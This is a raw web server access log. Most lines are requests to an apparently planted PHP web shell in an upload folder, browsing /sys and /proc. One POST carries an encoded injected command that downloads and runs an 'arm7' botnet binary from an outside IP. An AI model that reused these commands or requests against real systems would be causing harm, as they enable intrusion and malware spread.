44.212.106.171 - - [30/Oct/2025:04:32:48 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/event1/subsystem/input2/subsystem/input1/subsystem/input1/subsystem/input0/device HTTP/1.1" 200 11789
20.171.207.131 - - [30/Oct/2025:04:32:49 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/system/cpu/cpu1/driver/cpu3/cache/index3 HTTP/1.1" 200 10423
20.171.207.131 - - [30/Oct/2025:04:32:50 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty7/subsystem/tty45/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:32:51 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty60/subsystem/tty38/power HTTP/1.1" 200 9884
54.147.182.90 - - [30/Oct/2025:04:32:51 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/virtual/misc/crash/subsystem/vga_arbiter/subsystem/snapshot/subsystem/autofs/subsystem/mcelog HTTP/1.1" 200 6397
20.171.207.131 - - [30/Oct/2025:04:32:52 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty0/subsystem/tty35/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:32:53 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty4/subsystem/tty56/power HTTP/1.1" 200 9843
43.153.76.247 - - [30/Oct/2025:04:32:54 +0900] "GET /pc/member/terms.php HTTP/1.1" 200 14284
20.171.207.131 - - [30/Oct/2025:04:32:55 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty17/subsystem/tty61/power HTTP/1.1" 200 9884
54.84.93.8 - - [30/Oct/2025:04:32:55 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/input3/subsystem/event0/subsystem/mice/subsystem/input2/input2::compose/device/subsystem/input4/id HTTP/1.1" 200 7104
20.171.207.131 - - [30/Oct/2025:04:32:56 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty56/subsystem/tty31/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:32:57 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/system/cpu/cpu3/driver/cpu2/cpuidle/state5 HTTP/1.1" 200 7769
20.171.207.131 - - [30/Oct/2025:04:32:58 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty8/subsystem/tty56/power HTTP/1.1" 200 9843
46.211.134.114 - - [30/Oct/2025:04:32:58 +0900] "GET /data/20251029_985879890340.jpeg HTTP/1.1" 302 237
46.211.134.114 - - [30/Oct/2025:04:32:59 +0900] "HEAD /data/20251029_703861402670.jpeg HTTP/1.1" 302 -
46.211.134.114 - - [30/Oct/2025:04:32:59 +0900] "HEAD /data/20251029_671530258460.jpg HTTP/1.1" 302 -
46.211.134.114 - - [30/Oct/2025:04:32:59 +0900] "HEAD /data/20251029_985879890340.jpeg HTTP/1.1" 302 -
52.204.37.237 - - [30/Oct/2025:04:32:59 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/event3/subsystem/event2/subsystem/mice/subsystem/input2/input2::compose/device/event2/device/subsystem HTTP/1.1" 200 14687
20.171.207.131 - - [30/Oct/2025:04:32:59 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty11/subsystem/tty53/power HTTP/1.1" 200 9884
46.211.134.114 - - [30/Oct/2025:04:33:00 +0900] "GET /data/20251029_703861402670.jpeg HTTP/1.1" 302 237
20.171.207.131 - - [30/Oct/2025:04:33:00 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty60/subsystem/tty53/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:33:01 +0900] "GET /data/submain/1758633636.php?filesrc=//sys/devices/system/cpu/cpu1/driver/cpu3/cache/index3/ways_of_associativity&path=//sys/devices/system/cpu/cpu1/driver/cpu3/cache/index3 HTTP/1.1" 200 1764
46.211.134.114 - - [30/Oct/2025:04:33:02 +0900] "GET /data/20251029_671530258460.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:33:03 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty8/subsystem/tty41/power HTTP/1.1" 200 9843
34.239.85.139 - - [30/Oct/2025:04:33:04 +0900] "GET /data/submain/1758633636.php?path=//sys/class/misc/mcelog/subsystem/vga_arbiter/subsystem/device-mapper/subsystem/snapshot/subsystem/hpet/power HTTP/1.1" 200 12267
20.171.207.131 - - [30/Oct/2025:04:33:04 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty43/subsystem/tty55/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:33:05 +0900] "GET /data/submain/1758633636.php?filesrc=//proc/self/root/sys/class/tty/tty0/subsystem/tty35/power/runtime_active_time&path=//proc/self/root/sys/class/tty/tty0/subsystem/tty35/power HTTP/1.1" 200 1816
20.171.207.131 - - [30/Oct/2025:04:33:06 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty8/subsystem/tty15/power HTTP/1.1" 200 9843
34.206.212.24 - - [30/Oct/2025:04:33:07 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/virtual/misc/nvram/subsystem/snapshot/subsystem/hw_random/subsystem/snapshot/subsystem/hpet HTTP/1.1" 200 6355
20.171.207.131 - - [30/Oct/2025:04:33:07 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/system/cpu/cpu3/driver/cpu0/cpuidle/state8 HTTP/1.1" 200 7769
20.171.207.131 - - [30/Oct/2025:04:33:08 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty55/subsystem/tty38/power HTTP/1.1" 200 9884
46.96.66.59 - - [30/Oct/2025:04:33:09 +0900] "GET /data/20251029_985879890340.jpeg HTTP/1.1" 302 237
20.171.207.131 - - [30/Oct/2025:04:33:10 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty11/subsystem/tty57/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:33:11 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty16/subsystem/tty43/power HTTP/1.1" 200 9884
44.217.255.167 - - [30/Oct/2025:04:33:11 +0900] "GET /data/submain/1758633636.php?path=//sys/dev/char/10:61/subsystem/snapshot/subsystem/snapshot/subsystem/crash/subsystem/network_throughput HTTP/1.1" 200 6159
20.171.207.131 - - [30/Oct/2025:04:33:12 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty7/subsystem/tty23/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:33:13 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/system/cpu/cpu3/driver/cpu2/cpuidle/state3 HTTP/1.1" 200 7769
20.171.207.131 - - [30/Oct/2025:04:33:14 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty6/subsystem/tty50/power HTTP/1.1" 200 9843
35.173.18.61 - - [30/Oct/2025:04:33:15 +0900] "GET /data/submain/1758633636.php?path=//sys/dev/char/1:1/subsystem/port/subsystem/null/subsystem/null/subsystem/mem HTTP/1.1" 200 5685
20.171.207.131 - - [30/Oct/2025:04:33:15 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty56/subsystem/tty16/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:33:17 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty6/subsystem/tty54/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:33:18 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty14/subsystem/tty36/power HTTP/1.1" 200 9884
87.120.191.84 - - [30/Oct/2025:04:33:18 +0900] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.156.87.25:32843%2Fshaiiiii%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 208
20.171.207.131 - - [30/Oct/2025:04:33:19 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty22/subsystem/tty62/power HTTP/1.1" 200 9884
23.23.213.182 - - [30/Oct/2025:04:33:19 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/input1/subsystem/event0/subsystem/event0/device/subsystem/input1/id HTTP/1.1" 200 6164
20.171.207.131 - - [30/Oct/2025:04:33:20 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty51/subsystem/tty15/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:33:21 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty36/subsystem/tty50/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:33:22 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty53/subsystem/tty46/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:33:24 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty31/subsystem/tty51/power HTTP/1.1" 200 9884
35.169.119.108 - - [30/Oct/2025:04:33:24 +0900] "GET /data/submain/1758633636.php?path=//sys/class/misc/vga_arbiter/subsystem/vga_arbiter/subsystem/snapshot/subsystem/vga_arbiter/subsystem/mcelog HTTP/1.1" 200 6337
20.171.207.131 - - [30/Oct/2025:04:33:25 +0900] "GET /data/submain/1758633636.php?filesrc=//proc/self/root/sys/class/tty/tty7/subsystem/tty23/power/runtime_suspended_time&path=//proc/self/root/sys/class/tty/tty7/subsystem/tty23/power HTTP/1.1" 200 1819
20.171.207.131 - - [30/Oct/2025:04:33:26 +0900] "GET /data/submain/1758633636.php?filesrc=//proc/self/root/sys/class/tty/tty7/subsystem/tty23/power/runtime_usage&path=//proc/self/root/sys/class/tty/tty7/subsystem/tty23/power HTTP/1.1" 200 1810
20.171.207.131 - - [30/Oct/2025:04:33:27 +0900] "GET /data/submain/1758633636.php?filesrc=//proc/self/root/sys/class/tty/tty7/subsystem/tty23/power/async&path=//proc/self/root/sys/class/tty/tty7/subsystem/tty23/power HTTP/1.1" 200 1809
44.217.255.167 - - [30/Oct/2025:04:33:27 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/event0/subsystem/mice/subsystem/js0/subsystem/input2/input2::compose/device/subsystem/input3/device HTTP/1.1" 200 19293
20.171.207.131 - - [30/Oct/2025:04:33:28 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty63/subsystem/tty21/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:33:29 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty1/subsystem/tty45/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:33:31 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty1/subsystem/tty26/power HTTP/1.1" 200 9843
18.211.148.239 - - [30/Oct/2025:04:33:31 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/input3/subsystem/input0/subsystem/input1/subsystem/input1/subsystem/event1 HTTP/1.1" 200 6831
20.171.207.131 - - [30/Oct/2025:04:33:32 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty6/subsystem/tty25/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:33:33 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty31/subsystem/tty60/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:33:34 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty5/subsystem/tty21/power HTTP/1.1" 200 9843
46.211.134.114 - - [30/Oct/2025:04:33:35 +0900] "GET /data/20251029_671530258460.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:33:35 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty5/subsystem/tty18/power HTTP/1.1" 200 9843
46.211.134.114 - - [30/Oct/2025:04:33:36 +0900] "GET /data/20251029_703861402670.jpeg HTTP/1.1" 302 237
54.84.93.8 - - [30/Oct/2025:04:33:36 +0900] "GET /data/submain/1758633636.php?path=//sys/class/misc/nvram/subsystem/network_throughput/subsystem/snapshot/subsystem/nvram/subsystem/hpet HTTP/1.1" 200 6207
20.171.207.131 - - [30/Oct/2025:04:33:36 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty56/subsystem/tty43/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:33:38 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty13/subsystem/tty35/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:33:39 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty0/subsystem/tty15/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:33:40 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty62/subsystem/tty31/power HTTP/1.1" 200 9884
54.163.169.168 - - [30/Oct/2025:04:33:41 +0900] "GET /data/submain/1758633636.php?path=//sys/class/misc/autofs/subsystem/kvm/subsystem/autofs/subsystem/vga_arbiter/subsystem/autofs HTTP/1.1" 200 6001
20.171.207.131 - - [30/Oct/2025:04:33:41 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty52/subsystem/tty63/power HTTP/1.1" 200 9884
46.96.86.101 - - [30/Oct/2025:04:33:42 +0900] "HEAD /data/20251029_985879890340.jpeg HTTP/1.1" 302 -
46.96.86.101 - - [30/Oct/2025:04:33:42 +0900] "HEAD /data/20251029_415505606960.jpg HTTP/1.1" 302 -
46.96.86.101 - - [30/Oct/2025:04:33:42 +0900] "HEAD /data/20251029_703861402670.jpeg HTTP/1.1" 302 -
46.96.86.101 - - [30/Oct/2025:04:33:42 +0900] "HEAD /data/20251029_763305016740.jpeg HTTP/1.1" 302 -
46.96.86.101 - - [30/Oct/2025:04:33:42 +0900] "HEAD /data/20251029_345828431330.jpeg HTTP/1.1" 302 -
46.96.86.101 - - [30/Oct/2025:04:33:42 +0900] "HEAD /data/20251029_671530258460.jpg HTTP/1.1" 302 -
20.171.207.131 - - [30/Oct/2025:04:33:42 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty0/subsystem/tty37/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:33:43 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty36/subsystem/tty41/power HTTP/1.1" 200 9884
46.96.86.101 - - [30/Oct/2025:04:33:43 +0900] "GET /data/20251029_703861402670.jpeg HTTP/1.1" 302 237
46.96.86.101 - - [30/Oct/2025:04:33:43 +0900] "GET /data/20251029_671530258460.jpg HTTP/1.1" 302 236
46.96.86.101 - - [30/Oct/2025:04:33:43 +0900] "GET /data/20251029_985879890340.jpeg HTTP/1.1" 302 237
46.96.86.101 - - [30/Oct/2025:04:33:43 +0900] "GET /data/20251029_415505606960.jpg HTTP/1.1" 302 236
46.96.86.101 - - [30/Oct/2025:04:33:44 +0900] "GET /data/20251029_763305016740.jpeg HTTP/1.1" 302 237
54.163.169.168 - - [30/Oct/2025:04:33:44 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/event2/subsystem/input1/subsystem/mice/subsystem/input0/subsystem/input2 HTTP/1.1" 200 17413
46.96.86.101 - - [30/Oct/2025:04:33:44 +0900] "GET /data/20251029_345828431330.jpeg HTTP/1.1" 302 237
20.171.207.131 - - [30/Oct/2025:04:33:44 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty0/subsystem/tty61/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:33:45 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty3/subsystem/tty50/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:33:47 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty50/subsystem/tty63/power HTTP/1.1" 200 9884
34.230.124.21 - - [30/Oct/2025:04:33:47 +0900] "GET /data/submain/1758633636.php?path=//sys/class/misc/vga_arbiter/subsystem/hpet/subsystem/network_throughput/subsystem/snapshot/subsystem/nvram/power HTTP/1.1" 200 12441
20.171.207.131 - - [30/Oct/2025:04:33:48 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty22/subsystem/tty36/power HTTP/1.1" 200 9884
46.96.66.59 - - [30/Oct/2025:04:33:48 +0900] "GET /data/20251029_671530258460.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:33:49 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty52/subsystem/tty36/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:33:50 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty61/subsystem/tty12/power HTTP/1.1" 200 9884
18.210.58.238 - - [30/Oct/2025:04:33:51 +0900] "GET /data/submain/1758633636.php?path=//sys/class/misc/mcelog/subsystem/snapshot/subsystem/mcelog/subsystem/crash/subsystem/kvm HTTP/1.1" 200 5955
20.171.207.131 - - [30/Oct/2025:04:33:51 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty6/subsystem/tty48/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:33:52 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty2/subsystem/tty36/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:33:54 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty4/subsystem/tty11/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:33:55 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/system/cpu/cpu3/driver/cpu1/cpuidle/state8 HTTP/1.1" 200 7769
52.45.194.165 - - [30/Oct/2025:04:33:55 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/input2/subsystem/input0/event0/subsystem/input0/subsystem/input0/event0 HTTP/1.1" 200 6765
20.171.207.131 - - [30/Oct/2025:04:33:56 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty32/subsystem/tty61/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:33:57 +0900] "GET /data/submain/1758633636.php?filesrc=//proc/self/root/sys/class/tty/tty3/subsystem/tty50/power/runtime_active_time&path=//proc/self/root/sys/class/tty/tty3/subsystem/tty50/power HTTP/1.1" 200 1816
20.171.207.131 - - [30/Oct/2025:04:33:58 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty12/subsystem/tty61/power HTTP/1.1" 200 9884
44.221.37.41 - - [30/Oct/2025:04:33:59 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/input0/subsystem/input1/event1/subsystem/input2/subsystem/input1/device HTTP/1.1" 200 8545
20.171.207.131 - - [30/Oct/2025:04:33:59 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty51/subsystem/tty35/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:34:00 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty4/subsystem/tty54/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:34:02 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty7/subsystem/tty31/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:34:03 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty18/subsystem/tty53/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:34:04 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty1/subsystem/tty25/power HTTP/1.1" 200 9843
18.233.24.238 - - [30/Oct/2025:04:34:05 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/event1/subsystem/input3/subsystem/mice/subsystem/input2/input2::compose/device/input2::compose HTTP/1.1" 200 9486
64.226.82.217 - - [30/Oct/2025:04:34:05 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
192.162.210.232 - - [30/Oct/2025:04:34:05 +0900] "GET /data/20251029_415505606960.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:34:05 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty7/subsystem/tty53/power HTTP/1.1" 200 9843
192.162.210.232 - - [30/Oct/2025:04:34:06 +0900] "GET /data/20251029_415505606960.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:34:06 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty35/subsystem/tty62/power HTTP/1.1" 200 9884
192.162.210.232 - - [30/Oct/2025:04:34:07 +0900] "GET /data/20251029_415505606960.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:34:07 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty11/subsystem/tty41/power HTTP/1.1" 200 9884
52.54.249.218 - - [30/Oct/2025:04:34:08 +0900] "GET /data/submain/1758633636.php?path=//sys/class/misc/nvram/subsystem/vga_arbiter/subsystem/snapshot/subsystem/snapshot/subsystem/snapshot/power HTTP/1.1" 200 12161
20.171.207.131 - - [30/Oct/2025:04:34:09 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty36/subsystem/tty26/power HTTP/1.1" 200 9884
64.226.82.217 - - [30/Oct/2025:04:34:10 +0900] "GET /data/20251029_991602509001.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:34:10 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty3/subsystem/tty48/power HTTP/1.1" 200 9843
64.226.82.217 - - [30/Oct/2025:04:34:10 +0900] "GET /data/20251029_390242239414.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:10 +0900] "GET /data/20251029_508163138895.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:10 +0900] "GET /data/20251029_192067140012.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:10 +0900] "GET /data/20251029_352900993219.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:10 +0900] "GET /data/20251029_376397586753.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:11 +0900] "GET /data/20251029_980708699906.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:34:11 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty7/subsystem/tty16/power HTTP/1.1" 200 9843
64.226.82.217 - - [30/Oct/2025:04:34:11 +0900] "GET /data/20251029_387897123307.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:11 +0900] "GET /data/20251029_809999514278.jpg HTTP/1.1" 302 236
18.214.138.148 - - [30/Oct/2025:04:34:12 +0900] "GET /data/submain/1758633636.php?path=//sys/class/misc/crash/subsystem/snapshot/subsystem/network_throughput/subsystem/autofs/subsystem/snapshot/power HTTP/1.1" 200 12374
20.171.207.131 - - [30/Oct/2025:04:34:12 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty31/subsystem/tty46/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:34:13 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty7/subsystem/tty30/power HTTP/1.1" 200 9843
192.162.210.232 - - [30/Oct/2025:04:34:13 +0900] "GET /data/20251029_345828431330.jpeg HTTP/1.1" 302 237
20.171.207.131 - - [30/Oct/2025:04:34:14 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty18/subsystem/tty35/power HTTP/1.1" 200 9884
192.162.210.232 - - [30/Oct/2025:04:34:15 +0900] "GET /data/20251029_345828431330.jpeg HTTP/1.1" 302 237
20.171.207.131 - - [30/Oct/2025:04:34:15 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty5/subsystem/tty28/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:34:17 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty63/subsystem/tty52/power HTTP/1.1" 200 9884
54.225.98.148 - - [30/Oct/2025:04:34:17 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/virtual/misc/snapshot/subsystem/snapshot/subsystem/kvm/subsystem/autofs/subsystem/autofs HTTP/1.1" 200 6303
20.171.207.131 - - [30/Oct/2025:04:34:18 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty0/subsystem/tty51/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:34:19 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty11/subsystem/tty51/power HTTP/1.1" 200 9884
46.211.215.16 - - [30/Oct/2025:04:34:20 +0900] "GET /data/20251029_703861402670.jpeg HTTP/1.1" 302 237
20.171.207.131 - - [30/Oct/2025:04:34:20 +0900] "GET /data/submain/1758633636.php?filesrc=//proc/self/root/sys/class/tty/tty11/subsystem/tty41/power/runtime_usage&path=//proc/self/root/sys/class/tty/tty11/subsystem/tty41/power HTTP/1.1" 200 1816
52.3.156.186 - - [30/Oct/2025:04:34:21 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/virtual/mem/port/subsystem/null/subsystem/null/subsystem/random/subsystem/null HTTP/1.1" 200 6082
20.171.207.131 - - [30/Oct/2025:04:34:21 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty61/subsystem/tty34/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:34:23 +0900] "GET /data/submain/1758633636.php?filesrc=//proc/self/root/sys/class/tty/tty31/subsystem/tty46/power/runtime_usage&path=//proc/self/root/sys/class/tty/tty31/subsystem/tty46/power HTTP/1.1" 200 1816
20.171.207.131 - - [30/Oct/2025:04:34:24 +0900] "GET /data/submain/1758633636.php?filesrc=//proc/self/root/sys/class/tty/tty7/subsystem/tty16/power/async&path=//proc/self/root/sys/class/tty/tty7/subsystem/tty16/power HTTP/1.1" 200 1809
20.171.207.131 - - [30/Oct/2025:04:34:25 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty14/subsystem/tty31/power HTTP/1.1" 200 9884
18.206.47.187 - - [30/Oct/2025:04:34:26 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/event1/subsystem/mice/subsystem/input0/subsystem/input2/input2::compose/device/subsystem/input0 HTTP/1.1" 200 14372
20.171.207.131 - - [30/Oct/2025:04:34:26 +0900] "GET /data/submain/1758633636.php?filesrc=//proc/self/root/sys/class/tty/tty7/subsystem/tty30/power/async&path=//proc/self/root/sys/class/tty/tty7/subsystem/tty30/power HTTP/1.1" 200 1809
20.171.207.131 - - [30/Oct/2025:04:34:27 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/system/cpu/cpu3/driver/cpu0/cpuidle/state5 HTTP/1.1" 200 7769
20.171.207.131 - - [30/Oct/2025:04:34:28 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty38/subsystem/tty56/power HTTP/1.1" 200 9884
193.24.247.153 - - [30/Oct/2025:04:34:29 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
18.213.27.222 - - [30/Oct/2025:04:34:29 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/event1/subsystem/input3/device/subsystem/drivers/hub/1-0:1.0/driver/1-0:1.0/subsystem HTTP/1.1" 200 7529
20.171.207.131 - - [30/Oct/2025:04:34:29 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty62/subsystem/tty53/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:34:31 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/system/cpu/cpu3/driver/cpu1/cpuidle/state5 HTTP/1.1" 200 7769
193.24.247.153 - - [30/Oct/2025:04:34:31 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
54.198.33.233 - - [30/Oct/2025:04:34:31 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/event1/subsystem/event1/subsystem/mice/subsystem/input2/input2::compose/device/event2 HTTP/1.1" 200 7155
86.40.122.8 - - [30/Oct/2025:04:34:31 +0900] "HEAD /data/20251029_451555721550.jpg HTTP/1.1" 302 -
49.51.183.220 - - [30/Oct/2025:04:34:31 +0900] "GET /index.php HTTP/1.1" 200 23942
178.137.76.226 - - [30/Oct/2025:04:34:31 +0900] "HEAD /data/20251029_451555721550.jpg HTTP/1.1" 302 -
192.162.210.232 - - [30/Oct/2025:04:34:31 +0900] "HEAD /data/20251029_451555721550.jpg HTTP/1.1" 302 -
5.248.189.224 - - [30/Oct/2025:04:34:31 +0900] "HEAD /data/20251029_451555721550.jpg HTTP/1.1" 302 -
5.248.189.224 - - [30/Oct/2025:04:34:31 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
93.171.214.203 - - [30/Oct/2025:04:34:31 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
